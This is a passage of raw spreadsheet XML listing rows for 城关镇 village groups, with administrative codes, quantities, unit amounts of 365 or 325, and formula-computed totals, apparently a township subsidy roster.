      <c r="F122" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G122" s="24">
        <v>1</v>
      </c>
      <c r="H122" s="25">
        <v>365</v>
      </c>
      <c r="I122" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J122" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K122" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="123" customHeight="1" spans="1:11">
      <c r="A123" s="23" t="s">
        <v>546</v>
      </c>
      <c r="B123" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C123" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D123" s="24" t="s">
        <v>547</v>
      </c>
      <c r="E123" s="24" t="s">
        <v>540</v>
      </c>
      <c r="F123" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G123" s="24">
        <v>1</v>
      </c>
      <c r="H123" s="25">
        <v>365</v>
      </c>
      <c r="I123" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J123" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K123" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="124" customHeight="1" spans="1:11">
      <c r="A124" s="23" t="s">
        <v>548</v>
      </c>
      <c r="B124" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C124" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D124" s="24" t="s">
        <v>549</v>
      </c>
      <c r="E124" s="24" t="s">
        <v>331</v>
      </c>
      <c r="F124" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G124" s="24">
        <v>1</v>
      </c>
      <c r="H124" s="25">
        <v>365</v>
      </c>
      <c r="I124" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J124" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K124" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="125" customHeight="1" spans="1:11">
      <c r="A125" s="23" t="s">
        <v>550</v>
      </c>
      <c r="B125" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C125" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D125" s="24" t="s">
        <v>551</v>
      </c>
      <c r="E125" s="24" t="s">
        <v>552</v>
      </c>
      <c r="F125" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G125" s="24">
        <v>1</v>
      </c>
      <c r="H125" s="25">
        <v>365</v>
      </c>
      <c r="I125" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J125" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K125" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="126" customHeight="1" spans="1:11">
      <c r="A126" s="23" t="s">
        <v>553</v>
      </c>
      <c r="B126" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C126" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D126" s="24" t="s">
        <v>554</v>
      </c>
      <c r="E126" s="24" t="s">
        <v>349</v>
      </c>
      <c r="F126" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G126" s="24">
        <v>1</v>
      </c>
      <c r="H126" s="25">
        <v>365</v>
      </c>
      <c r="I126" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J126" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K126" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="127" customHeight="1" spans="1:11">
      <c r="A127" s="23" t="s">
        <v>555</v>
      </c>
      <c r="B127" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C127" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D127" s="24" t="s">
        <v>556</v>
      </c>
      <c r="E127" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F127" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G127" s="24">
        <v>2</v>
      </c>
      <c r="H127" s="25">
        <v>325</v>
      </c>
      <c r="I127" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J127" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K127" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="128" customHeight="1" spans="1:11">
      <c r="A128" s="23" t="s">
        <v>557</v>
      </c>
      <c r="B128" s="24" t="str">
        <f>B127</f>
        <v>城关镇</v>
      </c>
      <c r="C128" s="24" t="str">
        <f>C127</f>
        <v>西北村</v>
      </c>
      <c r="D128" s="23" t="s">
        <v>558</v>
      </c>
      <c r="E128" s="23" t="s">
        <v>236</v>
      </c>
      <c r="F128" s="24" t="str">
        <f>F127</f>
        <v>4113210106</v>
      </c>
      <c r="G128" s="24"/>
      <c r="H128" s="24"/>
      <c r="I128" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J128" s="24"/>
      <c r="K128" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="129" customHeight="1" spans="1:14">
      <c r="A129" s="23" t="s">
        <v>559</v>
      </c>
      <c r="B129" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C129" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D129" s="24" t="s">
        <v>560</v>
      </c>
      <c r="E129" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F129" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G129" s="24">
        <v>2</v>
      </c>
      <c r="H129" s="25">
        <v>325</v>
      </c>
      <c r="I129" s="24">
        <f t="shared" si="1"/>
        <v>650</v>
      </c>
      <c r="J129" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K129" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="130" customHeight="1" spans="1:14">
      <c r="A130" s="23" t="s">
        <v>562</v>
      </c>
      <c r="B130" s="24" t="str">
        <f>B129</f>
        <v>城关镇</v>
      </c>
      <c r="C130" s="24" t="str">
        <f>C129</f>
        <v>西北村</v>
      </c>
      <c r="D130" s="23" t="s">
        <v>563</v>
      </c>
      <c r="E130" s="23" t="s">
        <v>320</v>
      </c>
      <c r="F130" s="24" t="str">
        <f>F129</f>
        <v>4113210106</v>
      </c>
      <c r="G130" s="24"/>
      <c r="H130" s="24"/>
      <c r="I130" s="24">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J130" s="24"/>
      <c r="K130" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="131" customHeight="1" spans="1:14">
      <c r="A131" s="23" t="s">
        <v>564</v>
      </c>
      <c r="B131" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C131" s="24" t="s">
        <v>286</v>
      </c>
      <c r="D131" s="24" t="s">
        <v>565</v>
      </c>
      <c r="E131" s="24" t="s">
        <v>239</v>
      </c>
      <c r="F131" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G131" s="24">
        <v>1</v>
      </c>
      <c r="H131" s="25">
        <v>365</v>
      </c>
      <c r="I131" s="24">
        <f t="shared" si="1"/>
        <v>365</v>
      </c>
      <c r="J131" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K131" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="132" customHeight="1" spans="1:14">
      <c r="A132" s="23" t="s">
        <v>566</v>
      </c>
      <c r="B132" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C132" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D132" s="24" t="s">
        <v>567</v>
      </c>
      <c r="E132" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F132" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G132" s="24">
        <v>2</v>
      </c>
      <c r="H132" s="25">
        <v>325</v>
      </c>
      <c r="I132" s="24">
        <f t="shared" ref="I132:I195" si="2">H132*G132</f>
        <v>650</v>
      </c>
      <c r="J132" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K132" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="133" customHeight="1" spans="1:14">
      <c r="A133" s="23" t="s">
        <v>568</v>
      </c>
      <c r="B133" s="24" t="str">
        <f>B132</f>
        <v>城关镇</v>
      </c>
      <c r="C133" s="24" t="str">
        <f>C132</f>
        <v>东北六组</v>
      </c>
      <c r="D133" s="23" t="s">
        <v>569</v>
      </c>
      <c r="E133" s="23" t="s">
        <v>320</v>
      </c>
      <c r="F133" s="24" t="str">
        <f>F132</f>
        <v>4113210103</v>
      </c>
      <c r="G133" s="24"/>
      <c r="H133" s="24"/>
      <c r="I133" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J133" s="24"/>
      <c r="K133" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="134" customHeight="1" spans="1:14">
      <c r="A134" s="23" t="s">
        <v>570</v>
      </c>
      <c r="B134" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C134" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D134" s="24" t="s">
        <v>571</v>
      </c>
      <c r="E134" s="24" t="s">
        <v>572</v>
      </c>
      <c r="F134" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G134" s="24">
        <v>1</v>
      </c>
      <c r="H134" s="25">
        <v>365</v>
      </c>
      <c r="I134" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J134" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K134" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="135" customHeight="1" spans="1:14">
      <c r="A135" s="23" t="s">
        <v>573</v>
      </c>
      <c r="B135" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C135" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D135" s="24" t="s">
        <v>574</v>
      </c>
      <c r="E135" s="24" t="s">
        <v>575</v>
      </c>
      <c r="F135" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G135" s="24">
        <v>1</v>
      </c>
      <c r="H135" s="25">
        <v>365</v>
      </c>
      <c r="I135" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J135" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K135" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="136" customHeight="1" spans="1:14">
      <c r="A136" s="23" t="s">
        <v>576</v>
      </c>
      <c r="B136" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C136" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D136" s="24" t="s">
        <v>577</v>
      </c>
      <c r="E136" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F136" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G136" s="24">
        <v>2</v>
      </c>
      <c r="H136" s="25">
        <v>325</v>
      </c>
      <c r="I136" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J136" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K136" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="137" customHeight="1" spans="1:14">
      <c r="A137" s="23" t="s">
        <v>579</v>
      </c>
      <c r="B137" s="24" t="str">
        <f>B136</f>
        <v>城关镇</v>
      </c>
      <c r="C137" s="24" t="str">
        <f>C136</f>
        <v>西北村</v>
      </c>
      <c r="D137" s="23" t="s">
        <v>580</v>
      </c>
      <c r="E137" s="23" t="s">
        <v>416</v>
      </c>
      <c r="F137" s="24" t="str">
        <f>F136</f>
        <v>4113210106</v>
      </c>
      <c r="G137" s="24"/>
      <c r="H137" s="24"/>
      <c r="I137" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J137" s="24"/>
      <c r="K137" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="138" customHeight="1" spans="1:14">
      <c r="A138" s="23" t="s">
        <v>581</v>
      </c>
      <c r="B138" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C138" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D138" s="24" t="s">
        <v>582</v>
      </c>
      <c r="E138" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F138" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G138" s="24">
        <v>2</v>
      </c>
      <c r="H138" s="25">
        <v>325</v>
      </c>
      <c r="I138" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J138" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K138" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="139" s="1" customFormat="1" customHeight="1" spans="1:14">
      <c r="A139" s="23" t="s">
        <v>583</v>
      </c>
      <c r="B139" s="27" t="s">
        <v>219</v>
      </c>
      <c r="C139" s="27" t="s">
        <v>263</v>
      </c>
      <c r="D139" s="27" t="s">
        <v>584</v>
      </c>
      <c r="E139" s="27" t="s">
        <v>585</v>
      </c>
      <c r="F139" s="27" t="s">
        <v>266</v>
      </c>
      <c r="G139" s="28"/>
      <c r="H139" s="28"/>
      <c r="I139" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J139" s="29" t="s">
        <v>586</v>
      </c>
      <c r="K139" s="24" t="s">
        <v>225</v>
      </c>
      <c r="L139" s="8"/>
      <c r="M139" s="8"/>
      <c r="N139" s="8"/>
    </row>
    <row r="140" customHeight="1" spans="1:14">
      <c r="A140" s="23" t="s">
        <v>587</v>
      </c>
      <c r="B140" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C140" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D140" s="24" t="s">
        <v>588</v>
      </c>
      <c r="E140" s="24" t="s">
        <v>589</v>
      </c>
      <c r="F140" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G140" s="24">
        <v>1</v>
      </c>
      <c r="H140" s="25">
        <v>365</v>
      </c>
      <c r="I140" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J140" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K140" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="141" customHeight="1" spans="1:14">
      <c r="A141" s="23" t="s">
        <v>590</v>
      </c>
      <c r="B141" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C141" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D141" s="24" t="s">
        <v>591</v>
      </c>
      <c r="E141" s="24" t="s">
        <v>258</v>
      </c>
      <c r="F141" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G141" s="24">
        <v>1</v>
      </c>
      <c r="H141" s="25">
        <v>365</v>
      </c>
      <c r="I141" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J141" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K141" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="142" customHeight="1" spans="1:14">
      <c r="A142" s="23" t="s">
        <v>592</v>
      </c>
      <c r="B142" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C142" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D142" s="24" t="s">
        <v>437</v>
      </c>
      <c r="E142" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F142" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G142" s="24">
        <v>1</v>
      </c>
      <c r="H142" s="25">
        <v>365</v>
      </c>
      <c r="I142" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J142" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K142" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="143" customHeight="1" spans="1:14">
      <c r="A143" s="23" t="s">
        <v>593</v>
      </c>
      <c r="B143" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C143" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D143" s="24" t="s">
        <v>594</v>
      </c>
      <c r="E143" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F143" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G143" s="24">
        <v>2</v>
      </c>
      <c r="H143" s="25">
        <v>325</v>
      </c>
      <c r="I143" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J143" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K143" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="144" customHeight="1" spans="1:14">
      <c r="A144" s="23" t="s">
        <v>595</v>
      </c>
      <c r="B144" s="24" t="str">
        <f>B143</f>
        <v>城关镇</v>
      </c>
      <c r="C144" s="24" t="str">
        <f>C143</f>
        <v>西北村</v>
      </c>
      <c r="D144" s="23" t="s">
        <v>596</v>
      </c>
      <c r="E144" s="23" t="s">
        <v>597</v>
      </c>
      <c r="F144" s="24" t="str">
        <f>F143</f>
        <v>4113210106</v>
      </c>
      <c r="G144" s="24"/>
      <c r="H144" s="24"/>
      <c r="I144" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J144" s="24"/>
      <c r="K144" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="145" customHeight="1" spans="1:11">
      <c r="A145" s="23" t="s">
        <v>598</v>
      </c>
      <c r="B145" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C145" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D145" s="24" t="s">
        <v>599</v>
      </c>
      <c r="E145" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F145" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G145" s="24">
        <v>2</v>
      </c>
      <c r="H145" s="25">
        <v>325</v>
      </c>
      <c r="I145" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J145" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K145" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="146" customHeight="1" spans="1:11">
      <c r="A146" s="23" t="s">
        <v>600</v>
      </c>
      <c r="B146" s="24" t="str">
        <f>B145</f>
        <v>城关镇</v>
      </c>
      <c r="C146" s="24" t="str">
        <f>C145</f>
        <v>中华村</v>
      </c>
      <c r="D146" s="23" t="s">
        <v>601</v>
      </c>
      <c r="E146" s="23" t="s">
        <v>575</v>
      </c>
      <c r="F146" s="24" t="str">
        <f>F145</f>
        <v>4113210108</v>
      </c>
      <c r="G146" s="24"/>
      <c r="H146" s="24"/>
      <c r="I146" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J146" s="24"/>
      <c r="K146" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="147" customHeight="1" spans="1:11">
      <c r="A147" s="23" t="s">
        <v>602</v>
      </c>
      <c r="B147" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C147" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D147" s="24" t="s">
        <v>603</v>
      </c>
      <c r="E147" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F147" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G147" s="24">
        <v>1</v>
      </c>
      <c r="H147" s="25">
        <v>365</v>
      </c>
      <c r="I147" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J147" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K147" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="148" customHeight="1" spans="1:11">
      <c r="A148" s="23" t="s">
        <v>604</v>
      </c>
      <c r="B148" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C148" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D148" s="24" t="s">
        <v>605</v>
      </c>
      <c r="E148" s="24" t="s">
        <v>606</v>
      </c>
      <c r="F148" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G148" s="24">
        <v>2</v>
      </c>
      <c r="H148" s="25">
        <v>325</v>
      </c>
      <c r="I148" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J148" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K148" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="149" customHeight="1" spans="1:11">
      <c r="A149" s="23" t="s">
        <v>607</v>
      </c>
      <c r="B149" s="24" t="str">
        <f>B148</f>
        <v>城关镇</v>
      </c>
      <c r="C149" s="24" t="str">
        <f>C148</f>
        <v>西北村</v>
      </c>
      <c r="D149" s="23" t="s">
        <v>608</v>
      </c>
      <c r="E149" s="23" t="s">
        <v>402</v>
      </c>
      <c r="F149" s="24" t="str">
        <f>F148</f>
        <v>4113210106</v>
      </c>
      <c r="G149" s="24"/>
      <c r="H149" s="24"/>
      <c r="I149" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J149" s="24"/>
      <c r="K149" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="150" customHeight="1" spans="1:11">
      <c r="A150" s="23" t="s">
        <v>609</v>
      </c>
      <c r="B150" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C150" s="24" t="s">
        <v>220</v>
      </c>
      <c r="D150" s="24" t="s">
        <v>610</v>
      </c>
      <c r="E150" s="24" t="s">
        <v>611</v>
      </c>
      <c r="F150" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G150" s="24">
        <v>2</v>
      </c>
      <c r="H150" s="25">
        <v>325</v>
      </c>
      <c r="I150" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J150" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K150" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="151" customHeight="1" spans="1:11">
      <c r="A151" s="23" t="s">
        <v>612</v>
      </c>
      <c r="B151" s="24" t="str">
        <f>B150</f>
        <v>城关镇</v>
      </c>
      <c r="C151" s="24" t="str">
        <f>C150</f>
        <v>东北六组</v>
      </c>
      <c r="D151" s="23" t="s">
        <v>613</v>
      </c>
      <c r="E151" s="23" t="s">
        <v>239</v>
      </c>
      <c r="F151" s="24" t="str">
        <f>F150</f>
        <v>4113210103</v>
      </c>
      <c r="G151" s="24"/>
      <c r="H151" s="24"/>
      <c r="I151" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J151" s="24"/>
      <c r="K151" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="152" customHeight="1" spans="1:11">
      <c r="A152" s="23" t="s">
        <v>614</v>
      </c>
      <c r="B152" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C152" s="24" t="s">
        <v>271</v>
      </c>
      <c r="D152" s="24" t="s">
        <v>615</v>
      </c>
      <c r="E152" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F152" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G152" s="24">
        <v>1</v>
      </c>
      <c r="H152" s="25">
        <v>365</v>
      </c>
      <c r="I152" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J152" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K152" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="153" customHeight="1" spans="1:11">
      <c r="A153" s="23" t="s">
        <v>616</v>
      </c>
      <c r="B153" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C153" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D153" s="24" t="s">
        <v>617</v>
      </c>
      <c r="E153" s="24" t="s">
        <v>408</v>
      </c>
      <c r="F153" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G153" s="24">
        <v>1</v>
      </c>
      <c r="H153" s="25">
        <v>365</v>
      </c>
      <c r="I153" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J153" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K153" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="154" customHeight="1" spans="1:11">
      <c r="A154" s="23" t="s">
        <v>618</v>
      </c>
      <c r="B154" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C154" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D154" s="24" t="s">
        <v>619</v>
      </c>
      <c r="E154" s="24" t="s">
        <v>265</v>
      </c>
      <c r="F154" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G154" s="24">
        <v>1</v>
      </c>
      <c r="H154" s="25">
        <v>365</v>
      </c>
      <c r="I154" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J154" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K154" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="155" customHeight="1" spans="1:11">
      <c r="A155" s="23" t="s">
        <v>620</v>
      </c>
      <c r="B155" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C155" s="24" t="s">
        <v>263</v>
      </c>
      <c r="D155" s="24" t="s">
        <v>621</v>
      </c>
      <c r="E155" s="24" t="s">
        <v>611</v>
      </c>
      <c r="F155" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G155" s="24">
        <v>1</v>
      </c>
      <c r="H155" s="25">
        <v>365</v>
      </c>
      <c r="I155" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J155" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K155" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="156" customHeight="1" spans="1:11">
      <c r="A156" s="23" t="s">
        <v>622</v>
      </c>
      <c r="B156" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C156" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D156" s="24" t="s">
        <v>623</v>
      </c>
      <c r="E156" s="24" t="s">
        <v>624</v>
      </c>
      <c r="F156" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G156" s="24">
        <v>1</v>
      </c>
      <c r="H156" s="25">
        <v>365</v>
      </c>
      <c r="I156" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J156" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K156" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="157" customHeight="1" spans="1:11">
      <c r="A157" s="23" t="s">
        <v>625</v>
      </c>
      <c r="B157" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C157" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D157" s="24" t="s">
        <v>626</v>
      </c>
      <c r="E157" s="24" t="s">
        <v>627</v>
      </c>
      <c r="F157" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G157" s="24">
        <v>2</v>
      </c>
      <c r="H157" s="25">
        <v>325</v>
      </c>
      <c r="I157" s="24">
        <f t="shared" si="2"/>
        <v>650</v>
      </c>
      <c r="J157" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K157" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="158" customHeight="1" spans="1:11">
      <c r="A158" s="23" t="s">
        <v>628</v>
      </c>
      <c r="B158" s="24" t="str">
        <f>B157</f>
        <v>城关镇</v>
      </c>
      <c r="C158" s="24" t="str">
        <f>C157</f>
        <v>东北一组</v>
      </c>
      <c r="D158" s="23" t="s">
        <v>629</v>
      </c>
      <c r="E158" s="23" t="s">
        <v>572</v>
      </c>
      <c r="F158" s="24" t="str">
        <f>F157</f>
        <v>4113210103</v>
      </c>
      <c r="G158" s="24"/>
      <c r="H158" s="24"/>
      <c r="I158" s="24">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="J158" s="24"/>
      <c r="K158" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="159" customHeight="1" spans="1:11">
      <c r="A159" s="23" t="s">
        <v>630</v>
      </c>
      <c r="B159" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C159" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D159" s="24" t="s">
        <v>631</v>
      </c>
      <c r="E159" s="24" t="s">
        <v>632</v>
      </c>
      <c r="F159" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G159" s="24">
        <v>1</v>
      </c>
      <c r="H159" s="25">
        <v>365</v>
      </c>
      <c r="I159" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J159" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K159" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="160" customHeight="1" spans="1:11">
      <c r="A160" s="23" t="s">
        <v>633</v>
      </c>
      <c r="B160" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C160" s="24" t="s">
        <v>230</v>
      </c>
      <c r="D160" s="24" t="s">
        <v>634</v>
      </c>
      <c r="E160" s="24" t="s">
        <v>635</v>
      </c>
      <c r="F160" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G160" s="24">
        <v>1</v>
      </c>
      <c r="H160" s="25">
        <v>365</v>
      </c>
      <c r="I160" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J160" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K160" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="161" customHeight="1" spans="1:11">
      <c r="A161" s="23" t="s">
        <v>636</v>
      </c>
      <c r="B161" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C161" s="24" t="s">
        <v>637</v>
      </c>
      <c r="D161" s="24" t="s">
        <v>638</v>
      </c>
      <c r="E161" s="24" t="s">
        <v>639</v>
      </c>
      <c r="F161" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G161" s="24">
        <v>1</v>
      </c>
      <c r="H161" s="25">
        <v>365</v>
      </c>
      <c r="I161" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
      <c r="J161" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K161" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="162" customHeight="1" spans="1:11">
      <c r="A162" s="23" t="s">
        <v>640</v>
      </c>
      <c r="B162" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C162" s="24" t="s">
        <v>318</v>
      </c>
      <c r="D162" s="24" t="s">
        <v>641</v>
      </c>
      <c r="E162" s="24" t="s">
        <v>543</v>
      </c>
      <c r="F162" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G162" s="24">
        <v>1</v>
      </c>
      <c r="H162" s="25">
        <v>365</v>
      </c>
      <c r="I162" s="24">
        <f t="shared" si="2"/>
        <v>365</v>
      </c>
